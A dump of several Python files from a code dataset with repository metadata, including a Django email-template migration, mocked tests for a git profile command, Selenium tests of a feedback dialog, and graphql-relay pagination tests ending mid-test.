] | 14 | 2015-11-30T12:58:46.000Z | 2018-12-22T14:35:26.000Z | emailtemplates/migrations/0001_initial.py | deployed/django-emailtemplates | d33c80843092e397c78e9310fa4858a7bdc25cb6 | [
"MIT"
] | 10 | 2015-11-30T11:20:36.000Z | 2020-12-10T13:29:14.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-31 14:23
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='EmailTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(choices=[(b'accounts/activation.html', b'accounts/activation.html'), (b'project/introduction_project_mail_1d.html', b'project/introduction_project_mail_1d.html'), (b'project/notice_original_deletion_3days.html', b'project/notice_original_deletion_3days.html'), (b'accounts/password_reset_email.html', b'accounts/password_reset_email.html'), (b'accounts/email_verification.html', b'accounts/email_verification.html'), (b'share/invitation.html', b'share/invitation.html'), (b'orders/cancelled_payment.html', b'orders/cancelled_payment.html'), (b'project/new_template_available.html', b'project/new_template_available.html'), (b'supports/feedback_email.html', b'supports/feedback_email.html'), (b'invitations/invite_friend.html', b'invitations/invite_friend.html'), (b'project/introduction_project_mail_2d.html', b'project/introduction_project_mail_2d.html'), (b'share/invitation_subject.html', b'share/invitation_subject.html'), (b'orders/delivered.html', b'orders/delivered.html'), (b'project/project_action_notification.html', b'project/project_action_notification.html'), (b'project/notice_original_deletion_1week.html', b'project/notice_original_deletion_1week.html'), (b'accounts/welcome.html', b'accounts/welcome.html'), (b'project/download_zip.html', b'project/download_zip.html'), (b'orders/in_production.html', b'orders/in_production.html'), (b'project/notice_original_deletion_1month.html', b'project/notice_original_deletion_1month.html'), (b'accounts/introducing_email_4d.html', b'accounts/introducing_email_4d.html'), (b'orders/reorder_incentive_mail.html', b'orders/reorder_incentive_mail.html'), (b'project/project_action_like_comment_notification.html', b'project/project_action_like_comment_notification.html'), (b'accounts/introducing_email_2d.html', b'accounts/introducing_email_2d.html'), (b'project/package_expired.html', b'project/package_expired.html'), (b'project/package_upgrade.html', b'project/package_upgrade.html'), (b'project/introduction_project_mail_7d.html', b'project/introduction_project_mail_7d.html'), (b'subscriptions/subscription_email.html', b'subscriptions/subscription_email.html'), (b'accounts/introducing_email_3d.html', b'accounts/introducing_email_3d.html'), (b'accounts/introducing_email_1d.html', b'accounts/introducing_email_1d.html'), (b'supports/support_request.html', b'supports/support_request.html'), (b'supports/support_confirm.html', b'supports/support_confirm.html')], max_length=255, verbose_name='template')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
('content', models.TextField(verbose_name='content')),
('language', models.CharField(choices=[(b'de', b'German')], default=b'de', max_length=10, verbose_name='language')),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('modified', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.AlterUniqueTogether(
name='emailtemplate',
unique_together=set([('title', 'language')]),
),
]
| 107.529412 | 2,509 | 0.749453 | 474 | 3,656 | 5.535865 | 0.255274 | 0.116235 | 0.109756 | 0.073171 | 0.770579 | 0.737043 | 0.682546 | 0.485899 | 0.367378 | 0.105945 | 0 | 0.013665 | 0.099289 | 3,656 | 33 | 2,510 | 110.787879 | 0.783176 | 0.0186 | 0 | 0.08 | 1 | 0 | 0.604463 | 0.569596 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.04 | 0.12 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8686adc1d98f5e11b8099acdfadeaaf8b3f61d1c | 82 | py | Python | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 11 | 2020-01-28T15:40:25.000Z | 2021-01-02T23:09:05.000Z | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 30 | 2019-12-14T12:11:07.000Z | 2020-01-29T10:56:13.000Z | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 1 | 2020-01-29T13:15:46.000Z | 2020-01-29T13:15:46.000Z | from cherry.runner.trainer import Trainer
from cherry.runner.player import Player
| 27.333333 | 41 | 0.853659 | 12 | 82 | 5.833333 | 0.5 | 0.285714 | 0.457143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 82 | 2 | 42 | 41 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
869020b15db82244db9b587af332e454775e72c2 | 2,204 | py | Python | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 2 | 2020-11-11T08:45:07.000Z | 2021-09-02T18:36:21.000Z | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 24 | 2020-10-01T16:55:05.000Z | 2020-10-27T02:51:25.000Z | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 15 | 2020-10-02T03:43:30.000Z | 2021-10-01T03:48:32.000Z | import argparse
import os
import sys
sys.path.insert(1, os.getcwd())
from gits_profile import gits_set_profile
from mock import patch, Mock
def parse_args(args):
parser = argparse.ArgumentParser()
return parser.parse_args(args)
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace(email="email@address.com", name="name"))
@patch("subprocess.Popen")
def test_gits_profile_happy_case(mock_var, mock_args):
"""
Function to test gits profile, success case
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if test_result:
assert True, "Normal Case"
else:
assert False
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace(email="email", name="name"))
@patch("subprocess.Popen")
def test_gits_profile_sad_case_invalid_email(mock_var, mock_args):
"""
Function to test gits profile, failure case when email is invalid
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if not test_result:
assert True, "Normal Case"
else:
assert False
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace())
@patch("subprocess.Popen")
def test_gits_profile_sad_case_no_arguments(mock_var, mock_args):
"""
Function to test gits profile, failure case when no arguments are passed
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if not test_result:
assert True, "Normal Case"
else:
assert False
| 29.783784 | 94 | 0.705989 | 292 | 2,204 | 5.061644 | 0.219178 | 0.064953 | 0.060893 | 0.064953 | 0.81935 | 0.81935 | 0.81935 | 0.81935 | 0.81935 | 0.694858 | 0 | 0.003861 | 0.177405 | 2,204 | 73 | 95 | 30.191781 | 0.811362 | 0.082577 | 0 | 0.686275 | 0 | 0 | 0.183704 | 0.088057 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.078431 | false | 0 | 0.098039 | 0 | 0.196078 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8692555f43b25fbc923894859c25e1a7e3d4fc52 | 11,532 | py | Python | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 168 | 2015-01-03T02:09:30.000Z | 2022-03-31T22:28:00.000Z | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 4 | 2017-03-14T20:49:49.000Z | 2020-04-02T16:13:00.000Z | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 46 | 2015-01-18T04:39:24.000Z | 2022-02-17T22:33:05.000Z | # Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
from functionaltest import FunctionalTest, Url
class Test_2884_FeedbackForm(FunctionalTest):
def tearDown(self):
FunctionalTest.tearDown(self)
self.clear_email_for_address(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
def test_feedback_dialog_from_non_logged_in_page(self):
# * Harold is not logged in, and goes to the root Dirigible page.
self.go_to_url(Url.ROOT)
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * titled:
self.assertEquals('Help us improve',
self.get_text('css=.ui-dialog-title')
)
# * with some friendly text:
self.assertEquals(
"It's always a pleasure to hear from you!",
self.get_text('css=#id_feedback_dialog_blurb_big')
)
self.assertEquals(
"Ask us a question, or tell us what you love or hate about Dirigible:",
self.get_text('css=#id_feedback_dialog_blurb_small')
)
# * with a big freeform input field
# which has the focus
self.wait_for_element_visibility('id=id_feedback_dialog_text', True)
self.assertTrue(self.is_element_focused('id=id_feedback_dialog_text'))
# * an email field:
self.wait_for_element_visibility('id=id_feedback_dialog_email_address', True)
# The email field has a value indicating what it's for:
self.assertEquals(
"Email address (optional - only necessary if you would like us to contact you)",
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
# * that is grey
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'color'), '#808080')
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'font-style'), 'italic')
# * and ok and cancel buttons
self.wait_for_element_visibility('id=id_feedback_dialog_ok_button', True)
self.wait_for_element_visibility('id=id_feedback_dialog_cancel_button', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * He decides he wants us to be able to thank him for his kind words, so he moves to the
# email field
self.selenium.focus('id=id_feedback_dialog_email_address')
# * The prompt text disappears, and the field switches to non-italic non-grey text
self.assertEquals(
"",
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'color'), '#000000')
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'font-style'), 'normal')
# * He types his email address
SUBMITTED_EMAIL_ADDRESS = 'harold@mailinator.com'
self.selenium.type('id=id_feedback_dialog_email_address', SUBMITTED_EMAIL_ADDRESS)
# * Hits cancel and the form goes away wthout doing anything
self.selenium.click('id=id_feedback_dialog_cancel_button')
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * this time he means it, so he opens the form again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * His message and email are still there.
self.assertEquals(
MESSAGE,
self.selenium.get_value('id=id_feedback_dialog_text')
)
self.assertEquals(
SUBMITTED_EMAIL_ADDRESS,
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
# He clicks OK.
self.selenium.click('id=id_feedback_dialog_ok_button')
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * support@resolversystems.com receives an email with the text he
# entered and his email address
fromm, to, subject, body = self.pop_email_for_client(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
self.assertEquals(fromm, 'support@projectdirigible.com')
self.assertEquals(to, 'harold.testuser-admin@projectdirigible.com')
self.assertEquals(subject, '[Django] User feedback from Dirigible')
self.assertTrue(MESSAGE in body)
self.assertTrue(SUBMITTED_EMAIL_ADDRESS in body)
self.assertTrue("Page: %s" % (self.browser.current_url,) in body)
def test_feedback_dialog_from_logged_in_dashboard(self):
# * Harold logs in to Dirigible
sheet_id = self.login()
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * titled:
self.assertEquals('Help us improve',
self.get_text('css=.ui-dialog-title')
)
# * with some friendly text:
self.assertEquals(
"It's always a pleasure to hear from you!",
self.get_text('css=#id_feedback_dialog_blurb_big')
)
self.assertEquals(
"Ask us a question, or tell us what you love or hate about Dirigible:",
self.get_text('css=#id_feedback_dialog_blurb_small')
)
# * with a big freeform input field
# which has the focus
self.wait_for_element_visibility('id=id_feedback_dialog_text', True)
self.assertTrue(self.is_element_focused('id=id_feedback_dialog_text'))
# * There is no email field
self.wait_for_element_visibility('id=id_feedback_dialog_email_address', False)
# * and ok and cancel buttons
self.wait_for_element_visibility('id=id_feedback_dialog_ok_button', True)
self.wait_for_element_visibility('id=id_feedback_dialog_cancel_button', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * Hits cancel and the form goes away wthout doing anything
self.selenium.click('id=id_feedback_dialog_cancel_button')
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * this time he means it, so he opens the form again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * His message is still there.
self.assertEquals(
MESSAGE,
self.selenium.get_value('id=id_feedback_dialog_text')
)
# * He hits OK
self.selenium.click('id=id_feedback_dialog_ok_button')
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * support@resolversystems.com receives an email with the text he
# entered and his username
fromm, to, subject, body = self.pop_email_for_client(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
self.assertEquals(fromm, 'support@projectdirigible.com')
self.assertEquals(to, 'harold.testuser-admin@projectdirigible.com')
self.assertEquals(subject, '[Django] User feedback from Dirigible')
self.assertTrue(MESSAGE in body)
self.assertTrue("Username: %s" % (self.get_my_username(),) in body)
self.assertTrue("Page: %s" % (self.browser.current_url,) in body)
def test_feedback_dialog_displays_submission_status(self):
# * Harold is not logged in, and goes to the root Dirigible page.
self.go_to_url(Url.ROOT)
self.selenium.get_eval("""
(function () {
var oldAjax = window.$.ajax;
function slowAjax(params) {
setTimeout(
function() { oldAjax(params); },
7000
);
}
window.$.ajax = slowAjax;
})()
""");
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * He types his email address
SUBMITTED_EMAIL_ADDRESS = 'harold@mailinator.com'
self.selenium.type('id=id_feedback_dialog_email_address', SUBMITTED_EMAIL_ADDRESS)
# Something goes wrong with the Dirigible server
old_feedback_url = self.selenium.get_eval("window.urls.feedback")
self.selenium.get_eval("window.urls.feedback = 'blergh'")
# Blissfully unaware of this, Harold clicks OK.
self.selenium.click('id=id_feedback_dialog_ok_button')
# The dialog remains, the buttons go disabled
self.wait_for(
lambda: not self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become disabled'
)
self.wait_for(
lambda: not self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become disabled'
)
# an error div appears to tell him that something is wrong.
self.wait_for_element_visibility('id=id_feedback_dialog', True)
self.wait_for_element_visibility('id=id_feedback_dialog_error', True)
# the buttons become enabled again
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become enabled'
)
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become enabled'
)
# He waits for a moment, and the server magically fixes itself.
self.selenium.get_eval("window.urls.feedback = '%s'" % (old_feedback_url,))
# He tries again.
self.selenium.click('id=id_feedback_dialog_ok_button')
# The error message disappears immediately
self.wait_for_element_visibility('id=id_feedback_dialog_error', False, timeout_seconds=3)
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * He brings up the dialog again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * He sees that the buttons are enabled and the error message is absent.
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become enabled'
)
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become enabled'
)
self.wait_for_element_visibility('id=id_feedback_dialog_error', False)
| 42.087591 | 109 | 0.656348 | 1,443 | 11,532 | 4.987526 | 0.155925 | 0.11477 | 0.124496 | 0.105044 | 0.822982 | 0.818952 | 0.814784 | 0.799361 | 0.799361 | 0.799361 | 0 | 0.002904 | 0.253469 | 11,532 | 273 | 110 | 42.241758 | 0.833082 | 0.181408 | 0 | 0.622754 | 0 | 0 | 0.348396 | 0.205585 | 0 | 0 | 0 | 0 | 0.173653 | 1 | 0.023952 | false | 0 | 0.005988 | 0 | 0.035928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
86961dd933a73f292da722fe76467657a20e950a | 242 | py | Python | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/__init__.py | xdjiangkai/ColossalAI | 4a3d3446b04065fa1c89b78cba673e96115c6325 | [
"Apache-2.0"
] | 1 | 2022-01-06T17:16:32.000Z | 2022-01-06T17:16:32.000Z | from .colossalai_layer import *
from .parallel_1d import *
from .parallel_2d import *
from .parallel_2p5d import *
from .parallel_3d import *
from .parallel_sequence import *
from .utils import *
from .vanilla import *
from .wrapper import *
| 24.2 | 32 | 0.77686 | 33 | 242 | 5.515152 | 0.393939 | 0.43956 | 0.494505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024272 | 0.14876 | 242 | 9 | 33 | 26.888889 | 0.859223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86d47f03820ceeb21682c096e8f60f4072f90a3d | 141 | py | Python | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | 2 | 2019-04-23T23:08:03.000Z | 2021-01-24T08:26:12.000Z | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | null | null | null | directed_information/__init__.py | elipugh/directed_information | d94172496a4d544c9e244c4a95acb8539017bb77 | [
"MIT"
] | null | null | null | from .compute_DI_MI import compute_DI_MI
from .ctwalgorithm import ctwalgorithm
from .ctwentropy import ctwentropy
from . import fast_mat_DI
| 28.2 | 40 | 0.858156 | 21 | 141 | 5.47619 | 0.428571 | 0.156522 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113475 | 141 | 4 | 41 | 35.25 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86f6f3b21a38ff481034ad5a0661f51db03c6a26 | 208 | py | Python | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | null | null | null | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | 5 | 2020-06-05T19:40:11.000Z | 2021-06-10T21:06:08.000Z | test/mainApp/admin.py | BoggerSancho/test_mydjango | b7c456e408e7c76881524e8c68987c1cf3ac7ea9 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from .models import Books, Transletors, Reader, Journal
admin.site.register(Books)
admin.site.register(Transletors)
admin.site.register(Reader)
admin.site.register(Journal)
| 23.111111 | 55 | 0.817308 | 28 | 208 | 6.071429 | 0.428571 | 0.211765 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081731 | 208 | 8 | 56 | 26 | 0.890052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
810558dba8a50d544ab6b7e446194865f9de946e | 22,710 | py | Python | FastAPI Server Based/Tutorial/venv/Lib/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | viswadeep-sarangi/DeployMLModel | 969a6425f2ac93188962f9c62a6b8cde94372212 | [
"MIT"
] | 2 | 2021-06-14T20:01:22.000Z | 2022-01-07T12:56:53.000Z | FastAPI Server Based/Tutorial/venv/Lib/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | viswadeep-sarangi/DeployMLModel | 969a6425f2ac93188962f9c62a6b8cde94372212 | [
"MIT"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | myvenv/lib/python3.6/site-packages/graphql_relay/connection/tests/test_arrayconnection.py | yog240597/saleor | b75a23827a4ec2ce91637f0afe6808c9d09da00a | [
"CC-BY-4.0"
] | 2 | 2021-04-12T18:16:00.000Z | 2021-06-26T05:01:18.000Z | from promise import Promise
from ..arrayconnection import (
connection_from_list,
connection_from_list_slice,
connection_from_promised_list,
connection_from_promised_list_slice,
cursor_for_object_in_connection
)
letters = ['A', 'B', 'C', 'D', 'E']
letters_promise = Promise.resolve(letters)
def test_returns_all_elements_without_filters():
c = connection_from_list(letters)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_respects_a_smaller_first():
c = connection_from_list(letters, dict(first=2))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_respects_an_overly_large_first():
c = connection_from_list(letters, dict(first=10))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_respects_a_smaller_last():
c = connection_from_list(letters, dict(last=2))
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_respects_an_overly_large_last():
c = connection_from_list(letters, dict(last=10))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_first_after():
c = connection_from_list(letters, dict(first=2, after='YXJyYXljb25uZWN0aW9uOjE='))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_pagination_respects_longfirst_after():
c = connection_from_list(
letters, dict(first=10, after='YXJyYXljb25uZWN0aW9uOjE='))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_last_before():
c = connection_from_list(letters, dict(last=2, before='YXJyYXljb25uZWN0aW9uOjM='))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_pagination_respects_longlast_before():
c = connection_from_list(
letters, dict(last=10, before='YXJyYXljb25uZWN0aW9uOjM='))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_first_after_before_few():
c = connection_from_list(letters, dict(
first=2, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
